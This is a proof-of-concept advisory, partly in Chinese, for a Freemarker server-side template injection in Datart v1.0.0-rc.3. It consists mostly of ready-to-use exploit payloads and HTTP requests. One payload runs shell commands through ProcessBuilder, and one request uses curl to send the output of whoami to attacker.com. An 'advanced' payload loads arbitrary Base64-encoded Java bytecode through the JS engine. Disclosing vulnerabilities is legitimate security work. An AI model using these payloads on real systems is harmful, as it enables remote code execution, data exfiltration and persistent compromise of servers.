# CVE-2025-70830: Datart Server-Side Template Injection (SSTI)

## 漏洞概述 (Overview)

- **CVE 编号**: CVE-2025-70830
- **受影响产品**: Datart
- **受影响版本**: v1.0.0-rc.3
- **漏洞类型**: Server-Side Template Injection (SSTI) - 服务端模板注入
- **危害等级**: Remote Code Execution (RCE)

## 漏洞描述 (Description)

Datart v1.0.0-rc.3 版本的 Freemarker 模板引擎存在服务端模板注入 (SSTI) 漏洞。
经过身份验证的攻击者可以通过在 SQL 脚本字段中注入恶意的 Freemarker 模板语法，从而执行任意系统代码。

## 复现步骤 (Proof of Concept)

### 1. 前置条件

- 登录 Datart 系统。
- 能够访问并编辑具有 SQL 执行功能的数据源 (Data Source)。

### 2. Payload 构造

在 SQL 脚本/查询编辑器 (SQL script/query editor) 中，输入以下 Freemarker Payload 可用于执行系统命令 (例如 `id` 或 `calc`)：

```freemarker
<#assign ob="freemarker.template.utility.ObjectConstructor"?new()>
<#assign pb=ob("java.lang.ProcessBuilder",["bash","-c","id"])>
${pb.start()}
SELECT 1
```

点击执行脚本，服务器将在后台执行该命令。

### 3. HTTP 请求示例

通过 API 触发漏洞的请求包如下：

```http
POST /api/v1/data-provider/execute/test HTTP/1.1
Host: target.com:8080
Content-Type: application/json
Authorization: Bearer {VALID_TOKEN}

{
  "sourceId": "valid_source_id",
  "script": "<#assign ob=\"freemarker.template.utility.ObjectConstructor\"?new()><#assign pb=ob(\"java.lang.ProcessBuilder\",[\"bash\",\"-c\",\"curl http://attacker.com/`whoami`\"])>${pb.start()}SELECT 1",
  "scriptType": "SQL",
  "size": 100
}
```

## 以此进阶利用 (Advanced Exploitation)

### 加载任意字节码 (Load Custom Bytecode)

攻击者可以利用 Java 的 `javax.script.ScriptEngineManager` 调用 JS 引擎来加载和执行任意 Base64 编码的 Java 字节码。

**Payload 示例:**

```http
POST /api/v1/data-provider/execute/test HTTP/1.1
Host: target.com:8080
Content-Type: application/json
Authorization: Bearer {VALID_TOKEN}

{
  "script": "<#assign ob='freemarker.template.utility.ObjectConstructor'?new()><#assign sem=ob('javax.script.ScriptEngineManager')><#assign engine=sem.getEngineByName('js')><#assign result=engine.eval('var classLoader=java.lang.Thread.currentThread().getContextClassLoader();var className=\"org.apache.shiro.coyote.deserialization.impl.UnwrappedPropertyHandler\";var base64Str=\"yv66..\";try{classLoader.loadClass(className).newInstance()}catch(e){var clsString=classLoader.loadClass(\"java.lang.String\");var bytecode;try{var clsBase64=classLoader.loadClass(\"java.util.Base64\");var clsDecoder=classLoader.loadClass(\"java.util.Base64$Decoder\");var decoder=clsBase64.getMethod(\"getDecoder\").invoke(null);bytecode=clsDecoder.getMethod(\"decode\",clsString).invoke(decoder,base64Str)}catch(ee){try{var datatypeConverterClz=classLoader.loadClass(\"javax.xml.bind.DatatypeConverter\");bytecode=datatypeConverterClz.getMethod(\"parseBase64Binary\",clsString).invoke(null,base64Str)}catch(eee){var clazz1=classLoader.loadClass(\"sun.misc.BASE64Decoder\");bytecode=clazz1.newInstance().decodeBuffer(base64Str)}}var clsClassLoader=classLoader.loadClass(\"java.lang.ClassLoader\");var clsByteArray=(new java.lang.String(\"a\").getBytes().getClass());var clsInt=java.lang.Integer.TYPE;var defineClass=clsClassLoader.getDeclaredMethod(\"defineClass\",[clsByteArray,clsInt,clsInt]);defineClass.setAccessible(true);var clazz=defineClass.invoke(classLoader,bytecode,new java.lang.Integer(0),new java.lang.Integer(bytecode.length));clazz.newInstance()}')>SELECT 1",
  "sourceId": "valid_source_id",
  "size": 1000,
  "scriptType": "SQL",
  "columns": "",
  "variables": []
}
```
